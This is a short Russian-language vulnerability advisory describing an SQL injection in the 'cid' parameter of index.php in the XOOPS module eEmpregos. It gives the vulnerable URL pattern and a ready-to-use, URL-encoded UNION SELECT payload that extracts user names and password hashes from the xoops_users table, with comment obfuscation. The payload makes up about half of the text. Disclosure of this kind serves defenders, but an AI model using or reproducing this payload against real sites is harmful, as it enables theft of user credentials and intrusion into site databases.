Программа: XOOPS Module eEmpregos
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://xxxx/modules/eEmpregos/index.php?pa=view&cid=[exploit]
EXPLOIT:
00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/* */from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202
